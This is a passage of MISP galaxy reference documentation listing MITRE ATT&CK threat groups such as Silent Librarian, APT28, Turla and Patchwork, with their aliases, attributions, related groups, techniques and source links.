[Silent Librarian](https://attack.mitre.org/groups/G0122) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://attack.mitre.org/groups/G0122) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Malwarebytes Silent Librarian October 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Silent Librarian - G0122"

Silent Librarian - G0122 is also known as:

  • Silent Librarian

  • TA407

  • COBALT DICKENS

Table 7040. Table References

Links

https://attack.mitre.org/groups/G0122

https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/

https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment

https://www.justice.gov/usao-sdny/press-release/file/1045781/download

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities

https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again

Volatile Cedar - G0123

[Volatile Cedar](https://attack.mitre.org/groups/G0123) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://attack.mitre.org/groups/G0123) has been operating since 2012 and is motivated by political and ideological interests.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Volatile Cedar - G0123"

Volatile Cedar - G0123 is also known as:

  • Volatile Cedar

  • Lebanese Cedar

Table 7041. Table References

Links

https://attack.mitre.org/groups/G0123

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Mustang Panda - G0129

[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Mustang Panda - G0129"

Mustang Panda - G0129 is also known as:

  • Mustang Panda

  • TA416

  • RedDelta

  • BRONZE PRESIDENT

Table 7042. Table References

Links

https://attack.mitre.org/groups/G0129

https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf

https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

https://www.secureworks.com/research/bronze-president-targets-ngos

Nomadic Octopus - G0133

[Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Nomadic Octopus - G0133"

Nomadic Octopus - G0133 is also known as:

  • Nomadic Octopus

  • DustSquad

Table 7043. Table References

Links

https://attack.mitre.org/groups/G0133

https://securelist.com/octopus-infested-seas-of-central-asia/88200/

https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html

https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia

https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf

Aquatic Panda - G0143

[Aquatic Panda](https://attack.mitre.org/groups/G0143) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://attack.mitre.org/groups/G0143) has primarily targeted entities in the telecommunications, technology, and government sectors.(Citation: CrowdStrike AQUATIC PANDA December 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Aquatic Panda - G0143"

Aquatic Panda - G0143 is also known as:

  • Aquatic Panda

Table 7044. Table References

Links

https://attack.mitre.org/groups/G0143

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

Transparent Tribe - G0134

[Transparent Tribe](https://attack.mitre.org/groups/G0134) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Transparent Tribe - G0134"

Transparent Tribe - G0134 is also known as:

  • Transparent Tribe

  • COPPER FIELDSTONE

  • APT36

  • Mythic Leopard

  • ProjectM

Transparent Tribe - G0134 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="透明部落 - APT-C-56" with estimative-language:likelihood-probability="likely"

Table 7045. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/

https://attack.mitre.org/groups/G0134

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

https://securelist.com/transparent-tribe-part-1/98127/

https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

Ferocious Kitten - G0137

[Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Ferocious Kitten - G0137"

Ferocious Kitten - G0137 is also known as:

  • Ferocious Kitten

Table 7046. Table References

Links

https://attack.mitre.org/groups/G0137

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

LAPSUS$ - G1004

[LAPSUS$](https://attack.mitre.org/groups/G1004) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)

The tag is: misp-galaxy:mitre-intrusion-set="LAPSUS$ - G1004"

LAPSUS$ - G1004 is also known as:

  • LAPSUS$

  • DEV-0537

Table 7047. Table References

Links

https://attack.mitre.org/groups/G1004

https://unit42.paloaltonetworks.com/lapsus-group/

https://www.bbc.com/news/technology-60953527

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

APT-C-36 - G0099

[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)

The tag is: misp-galaxy:mitre-intrusion-set="APT-C-36 - G0099"

APT-C-36 - G0099 is also known as:

  • APT-C-36

  • Blind Eagle

Table 7048. Table References

Links

https://attack.mitre.org/groups/G0099

https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/

TEMP.Veles - G0088

[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)

The tag is: misp-galaxy:mitre-intrusion-set="TEMP.Veles - G0088"

TEMP.Veles - G0088 is also known as:

  • TEMP.Veles

  • XENOTIME

Table 7049. Table References

Links

https://attack.mitre.org/groups/G0088

https://dragos.com/resource/xenotime/

https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html [https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ]

https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html

https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html

FIN10 - G0051

[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)

The tag is: misp-galaxy:mitre-intrusion-set="FIN10 - G0051"

FIN10 - G0051 is also known as:

  • FIN10

FIN10 - G0051 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 7050. Table References

Links

https://attack.mitre.org/groups/G0051

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf

APT12 - G0005

[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)

The tag is: misp-galaxy:mitre-intrusion-set="APT12 - G0005"

APT12 - G0005 is also known as:

  • APT12

  • IXESHE

  • DynCalc

  • Numbered Panda

  • DNSCALC

APT12 - G0005 has relationships with:

  • similar: misp-galaxy:threat-actor="APT12" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Ixeshe - S0015" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-malware="RIPTIDE - S0003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7051. Table References

Links

http://www.crowdstrike.com/blog/whois-numbered-panda/

https://attack.mitre.org/groups/G0005

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

APT30 - G0013

[APT30](https://attack.mitre.org/groups/G0013) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: FireEye APT30)(Citation: Baumgartner Golovkin Naikon 2015)

The tag is: misp-galaxy:mitre-intrusion-set="APT30 - G0013"

APT30 - G0013 is also known as:

  • APT30

APT30 - G0013 has relationships with:

  • similar: misp-galaxy:threat-actor="Naikon" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Naikon - G0019" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="BACKSPACE - S0031" with estimative-language:likelihood-probability="almost-certain"

Table 7052. Table References

Links

https://attack.mitre.org/groups/G0013

https://securelist.com/the-naikon-apt/69953/

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

APT1 - G0006

[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-intrusion-set="APT1 - G0006"

APT1 - G0006 is also known as:

  • APT1

  • Comment Crew

  • Comment Group

  • Comment Panda

APT1 - G0006 has relationships with:

  • similar: misp-galaxy:threat-actor="APT1" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 7053. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/groups/G0006

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Axiom - G0001

[Axiom](https://attack.mitre.org/groups/G0001) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://attack.mitre.org/groups/G0001) and [Winnti Group](https://attack.mitre.org/groups/G0044) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Axiom - G0001"

Axiom - G0001 is also known as:

  • Axiom

  • Group 72

Axiom - G0001 has relationships with:

  • similar: misp-galaxy:threat-actor="APT17" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT17 - G0025" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 7054. Table References

Links

http://blogs.cisco.com/security/talos/threat-spotlight-group-72

https://attack.mitre.org/groups/G0001

https://securelist.com/games-are-over/70991/

https://securelist.com/winnti-more-than-just-a-game/37029/

https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

Inception - G0100

[Inception](https://attack.mitre.org/groups/G0100) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.(Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March 2018)(Citation: Kaspersky Cloud Atlas December 2014)

The tag is: misp-galaxy:mitre-intrusion-set="Inception - G0100"

Inception - G0100 is also known as:

  • Inception

  • Inception Framework

  • Cloud Atlas

Table 7055. Table References

Links

https://attack.mitre.org/groups/G0100

https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies

https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/

Turla - G0010

[Turla](https://attack.mitre.org/groups/G0010) is a cyber espionage threat group that has been attributed to Russia’s Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as [Uroburos](https://attack.mitre.org/software/S0022).(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)

The tag is: misp-galaxy:mitre-intrusion-set="Turla - G0010"

Turla - G0010 is also known as:

  • Turla

  • IRON HUNTER

  • Group 88

  • Belugasturgeon

  • Waterbug

  • WhiteBear

  • Snake

  • Krypton

  • Venomous Bear

Turla - G0010 has relationships with:

  • similar: misp-galaxy:threat-actor="APT26" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Turla" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Epic - S0091" with estimative-language:likelihood-probability="almost-certain"

Table 7056. Table References

Links

http://www.secureworks.com/research/threat-profiles/iron-hunter

https://attack.mitre.org/groups/G0010

https://blog.talosintelligence.com/2021/09/tinyturla.html

https://securelist.com/introducing-whitebear/81638/

https://securelist.com/the-epic-turla-operation/65545/

https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/

https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf

APT32 - G0050

[APT32](https://attack.mitre.org/groups/G0050) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)

The tag is: misp-galaxy:mitre-intrusion-set="APT32 - G0050"

APT32 - G0050 is also known as:

  • APT32

  • SeaLotus

  • OceanLotus

  • APT-C-00

APT32 - G0050 has relationships with:

  • similar: misp-galaxy:threat-actor="APT32" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="海莲花 - APT-C-00" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7057. Table References

Links

https://attack.mitre.org/groups/G0050

https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf

https://www.cybereason.com/blog/operation-cobalt-kitty-apt

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/

https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/

https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/

TA505 - G0092

[TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)

The tag is: misp-galaxy:mitre-intrusion-set="TA505 - G0092"

TA505 - G0092 is also known as:

  • TA505

  • Hive0065

Table 7058. Table References

Links

https://attack.mitre.org/groups/G0092

https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter

APT28 - G0007

[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)

[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).

The tag is: misp-galaxy:mitre-intrusion-set="APT28 - G0007"

APT28 - G0007 is also known as:

  • APT28

  • SNAKEMACKEREL

  • Swallowtail

  • Group 74

  • Sednit

  • Sofacy

  • Pawn Storm

  • Fancy Bear

  • STRONTIUM

  • Tsar Team

  • Threat Group-4127

  • TG-4127

APT28 - G0007 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="STRONTIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT28" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"

Table 7059. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/

https://attack.mitre.org/groups/G0007

https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/

https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://www.justice.gov/file/1080281/download

https://www.justice.gov/opa/page/file/1098481/download

https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/

https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

Equation - G0020

[Equation](https://attack.mitre.org/groups/G0020) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)

The tag is: misp-galaxy:mitre-intrusion-set="Equation - G0020"

Equation - G0020 is also known as:

  • Equation

Equation - G0020 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Component Firmware - T1109" with estimative-language:likelihood-probability="almost-certain"

Table 7060. Table References

Links

https://attack.mitre.org/groups/G0020

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

Moafee - G0002

[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)

The tag is: misp-galaxy:mitre-intrusion-set="Moafee - G0002"

Moafee - G0002 is also known as:

  • Moafee

Moafee - G0002 has relationships with:

  • similar: misp-galaxy:threat-actor="DragonOK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="DragonOK - G0017" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009" with estimative-language:likelihood-probability="almost-certain"

Table 7061. Table References

Links

https://attack.mitre.org/groups/G0002

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Ke3chang - G0004

[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Ke3chang - G0004"

Ke3chang - G0004 is also known as:

  • Ke3chang

  • APT15

  • Mirage

  • Vixen Panda

  • GREF

  • Playful Dragon

  • RoyalAPT

  • NICKEL

Ke3chang - G0004 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 7062. Table References

Links

https://attack.mitre.org/groups/G0004

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf

https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs

https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe

Cleaver - G0003

[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)

The tag is: misp-galaxy:mitre-intrusion-set="Cleaver - G0003"

Cleaver - G0003 is also known as:

  • Cleaver

  • Threat Group 2889

  • TG-2889

Cleaver - G0003 has relationships with:

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="TinyZBot - S0004" with estimative-language:likelihood-probability="almost-certain"

Table 7063. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/

https://attack.mitre.org/groups/G0003

https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Patchwork - G0040

[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Patchwork - G0040"

Patchwork - G0040 is also known as:

  • Patchwork

  • Hangover Group

  • Dropping Elephant

  • Chinastrats

  • MONSOON

  • Operation Hangover

Patchwork - G0040 has relationships with:

  • similar: misp-galaxy:threat-actor="QUILTED TIGER" with estimative-language:likelihood-probability="likely"

